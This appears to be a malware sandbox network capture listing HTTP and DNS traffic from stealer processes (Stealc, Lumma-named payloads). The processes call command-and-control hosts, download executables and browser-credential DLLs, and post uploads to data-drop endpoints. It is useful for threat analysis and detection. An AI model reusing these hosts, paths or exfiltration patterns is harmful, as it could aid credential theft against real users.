Host: 185.215.113.26
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.26/Dem7kTu/index.php

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

POST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 160
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://185.215.113.26/JLumma.exe

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

GET /JLumma.exe HTTP/1.1
Host: 185.215.113.26

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:46:52 GMT
Content-Type: application/x-msdos-program
Content-Length: 24202240
Connection: keep-alive
Last-Modified: Tue, 10 Sep 2024 16:21:51 GMT
ETag: "1714c00-621c6455985c0"
Accept-Ranges: bytes
POST

http://185.215.113.26/Dem7kTu/index.php

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

POST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.26/Dem7kTu/index.php

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

POST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.26/JUmer.exe

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

GET /JUmer.exe HTTP/1.1
Host: 185.215.113.26

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:28 GMT
Content-Type: application/x-msdos-program
Content-Length: 6662072
Connection: keep-alive
Last-Modified: Tue, 10 Sep 2024 10:24:58 GMT
ETag: "65a7b8-621c149091280"
Accept-Ranges: bytes
POST

http://185.215.113.26/Dem7kTu/index.php

Hkbsse.exe

Remote address:

185.215.113.26:80

Request

POST /Dem7kTu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.26
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.17/

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET / HTTP/1.1
Host: 185.215.113.17
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBK
Host: 185.215.113.17
Content-Length: 215
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC
Host: 185.215.113.17
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBG
Host: 185.215.113.17
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB
Host: 185.215.113.17
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC
Host: 185.215.113.17
Content-Length: 4763
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.17/f1ddeb6592c03206/freebl3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/mozglue.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/nss3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/nss3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:46:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/softokn3.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
GET

http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
Host: 185.215.113.17
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECF
Host: 185.215.113.17
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDG
Host: 185.215.113.17
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCFIJEBFCGDAAKFHIDBF
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBK
Host: 185.215.113.17
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.17/2fb6c2cc8dce150a.php

stealc_default2.exe

Remote address:

185.215.113.17:80

Request

POST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBG
Host: 185.215.113.17
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

fivevd5sr.top

Remote address:

8.8.8.8:53

Request

fivevd5sr.top

IN A

Response

fivevd5sr.top

IN A

188.225.44.114
DNS

67.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.113.215.185.in-addr.arpa

IN PTR

Response
DNS

93.62.133.62.in-addr.arpa

Remote address:

8.8.8.8:53

Request

93.62.133.62.in-addr.arpa

IN PTR

Response

93.62.133.62.in-addr.arpa

IN PTR

6-serverip-ptrtech
DNS

complainnykso.shop

Remote address:

8.8.8.8:53

Request

complainnykso.shop

IN A

Response

complainnykso.shop

IN A

172.67.151.164

complainnykso.shop

IN A

104.21.48.131
DNS

19.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.113.215.185.in-addr.arpa

IN PTR

Response
DNS

charistmatwio.shop

Remote address:

8.8.8.8:53

Request

charistmatwio.shop

IN A

Response

charistmatwio.shop

IN A

172.67.193.197

charistmatwio.shop

IN A

104.21.90.30
DNS

grassemenwji.shop

Remote address:

8.8.8.8:53

Request

grassemenwji.shop

IN A

Response

grassemenwji.shop

IN A

104.21.48.158

grassemenwji.shop

IN A

172.67.154.82
DNS

158.48.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

158.48.21.104.in-addr.arpa

IN PTR

Response
DNS

150.26.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

150.26.21.104.in-addr.arpa

IN PTR

Response
DNS

230.13.133.195.in-addr.arpa

Remote address:

8.8.8.8:53

Request

230.13.133.195.in-addr.arpa

IN PTR

Response
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

ocsp.comodoca.com

Remote address:

8.8.8.8:53

Request

ocsp.comodoca.com

IN A

Response

ocsp.comodoca.com

IN CNAME

ocsp.comodoca.com.cdn.cloudflare.net

ocsp.comodoca.com.cdn.cloudflare.net

IN A

104.18.38.233

ocsp.comodoca.com.cdn.cloudflare.net

IN A

172.64.149.23
DNS

136.132.29.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

136.132.29.66.in-addr.arpa

IN PTR

Response

136.132.29.66.in-addr.arpa

IN PTR

server341-2web-hostingcom
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

ipinfo.io

Remote address:

8.8.8.8:53

Request

ipinfo.io

IN A

Response

ipinfo.io

IN A

34.117.59.81
DNS

77.16.231.173.in-addr.arpa

Remote address:

8.8.8.8:53

Request

77.16.231.173.in-addr.arpa

IN PTR

Response

77.16.231.173.in-addr.arpa

IN PTR

apiipifyorg
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

ctldl.windowsupdate.com

Remote address:

8.8.8.8:53

Request

ctldl.windowsupdate.com

IN A

Response

ctldl.windowsupdate.com

IN CNAME

ctldl.windowsupdate.com.delivery.microsoft.com

ctldl.windowsupdate.com.delivery.microsoft.com

IN CNAME

wu-b-net.trafficmanager.net

wu-b-net.trafficmanager.net

IN CNAME

download.windowsupdate.com.edgesuite.net

download.windowsupdate.com.edgesuite.net

IN CNAME

a767.dspw65.akamai.net

a767.dspw65.akamai.net

IN A

2.22.144.73

a767.dspw65.akamai.net

IN A

2.22.144.81
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
POST

http://fivevd5sr.top/v1/upload.php

SÐµtup.exe

Remote address:

188.225.44.114:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary75845218
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 412
Host: fivevd5sr.top

Response

HTTP/1.1 200 OK

Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:15 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
GET

http://91.202.233.158/

svchost015.exe

Remote address:

91.202.233.158:80

Request

GET / HTTP/1.1
Host: 91.202.233.158
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://91.202.233.158/e96ea2db21fa9a1b.php

svchost015.exe

Remote address:

91.202.233.158:80

Request

POST /e96ea2db21fa9a1b.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHI
Host: 91.202.233.158
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://fivevd5sr.top/v1/upload.php

SÐµtup.exe

Remote address:

188.225.44.114:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary38372557
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 75232
Host: fivevd5sr.top

Response

HTTP/1.1 200 OK

Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:19 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
POST

http://fivevd5sr.top/v1/upload.php

SÐµtup.exe

Remote address:

188.225.44.114:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary52231359
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 34612
Host: fivevd5sr.top

Response

HTTP/1.1 200 OK

Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:23 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
GET

http://iakovosioannidis.com/parts/setup2.exe

Hkbsse.exe

Remote address:

62.133.62.93:80

Request

GET /parts/setup2.exe HTTP/1.1
Host: iakovosioannidis.com

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:25 GMT
Server: nginx/1.26.1
Content-Type: text/html; charset=UTF-8
Content-Length: 0
GET

https://conditionprovice.pro/tmpdir/9872345234.cab

acentric.exe

Remote address:

81.19.139.138:443

Request

GET /tmpdir/9872345234.cab HTTP/1.1
Host: conditionprovice.pro
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Thu, 12 Sep 2024 07:47:33 GMT
Content-Type: application/octet-stream
Content-Length: 435200
Last-Modified: Sat, 07 Sep 2024 19:59:56 GMT
Connection: keep-alive
ETag: "66dcb0bc-6a400"
Accept-Ranges: bytes
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php?scr=1

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODQ4MjU=
Host: 185.215.113.19
Content-Length: 84977
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
